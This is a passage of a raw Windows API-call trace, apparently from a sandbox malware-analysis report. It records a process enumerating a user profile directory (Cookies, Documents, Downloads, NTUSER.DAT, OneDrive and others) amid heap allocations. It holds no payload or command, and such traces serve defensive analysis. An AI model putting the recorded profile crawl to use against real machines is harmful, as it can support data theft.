(HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0184.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccab30 [0184.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0184.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cfe140 | out: hHeap=0x620000) returned 1 [0184.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0184.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0184.814] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0184.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0184.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0184.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0184.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0184.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0184.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddea0 [0184.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0184.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccab30 | out: hHeap=0x620000) returned 1 [0184.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0184.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0184.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0184.816] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8c1ba620, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0x8c1ba620, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0184.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0184.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0184.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x2c6ead8 [0184.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0184.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccab30 [0184.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddee8 [0184.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0184.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0184.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0184.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddea0 | out: hHeap=0x620000) returned 1 [0184.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0184.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0184.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0184.819] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98a34810, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98a34810, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0184.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0184.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0184.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddea0 [0184.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0184.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0184.820] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e833eb0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0184.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0184.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0184.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfc) returned 0x2c73318 [0184.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0184.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0184.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0184.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6581d8 [0184.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x658268 [0184.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93a80 [0184.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0184.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccab30 | out: hHeap=0x620000) returned 1 [0184.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddee8 | out: hHeap=0x620000) returned 1 [0184.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddea0 | out: hHeap=0x620000) returned 1 [0184.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6ead8 | out: hHeap=0x620000) returned 1 [0184.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddea0 [0184.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0184.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0184.823] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fbc40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0184.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0184.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0184.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0184.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0184.824] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0184.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0184.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0184.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0184.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0184.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0184.824] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0184.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccab30 [0184.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaad8 [0184.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16c) returned 0x2c7a838 [0184.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0184.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0184.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0184.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddee8 [0184.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0184.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93ac8 [0184.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93b10 [0184.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93b58 [0184.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93ba0 [0184.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0184.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0184.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0184.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6581d8 | out: hHeap=0x620000) returned 1 [0184.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x658268 | out: hHeap=0x620000) returned 1 [0184.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0184.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddea0 | out: hHeap=0x620000) returned 1 [0184.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0184.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0184.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaad8 | out: hHeap=0x620000) returned 1 [0184.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccab30 | out: hHeap=0x620000) returned 1 [0184.829] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98121430, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98121430, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0184.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0184.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddea0 [0184.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.829] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0184.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0184.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb4588 [0184.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccab30 [0184.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaad8 [0184.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccab30 | out: hHeap=0x620000) returned 1 [0184.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0184.830] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0184.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0184.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0184.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.831] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x791af7b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xa0a64910, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0xa0a64910, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0184.831] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79bf3690, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bf3690, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9f7ae870, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0184.831] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79bf3690, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bf3690, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79bf3690, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0184.831] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79bf3690, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bf3690, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9151ca20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0184.831] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79c197f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79c197f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9151ca20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0184.831] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79c3f950, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79c3f950, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9151ca20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0184.831] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x7945d070, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7945d070, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0184.831] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0184.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0184.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x214) returned 0x2e912b0 [0184.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0184.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccab30 [0184.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93a80 [0184.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93be8 [0184.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93c30 [0184.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93c78 [0184.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93cc0 [0184.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93d08 [0184.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93d50 [0184.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0184.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93d98 [0184.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac90 [0184.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e93de0 [0184.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0184.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0184.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0184.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddee8 | out: hHeap=0x620000) returned 1 [0184.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0184.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93ac8 | out: hHeap=0x620000) returned 1 [0184.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93b10 | out: hHeap=0x620000) returned 1 [0184.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93b58 | out: hHeap=0x620000) returned 1 [0184.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93ba0 | out: hHeap=0x620000) returned 1 [0184.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0184.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddea0 | out: hHeap=0x620000) returned 1 [0184.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaad8 | out: hHeap=0x620000) returned 1 [0184.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0184.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7a838 | out: hHeap=0x620000) returned 1 [0184.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0184.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.837] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9867c5b0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9867c5b0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0184.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0184.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.837] RtlAllocateHeap (HeapHandle=0x620000, 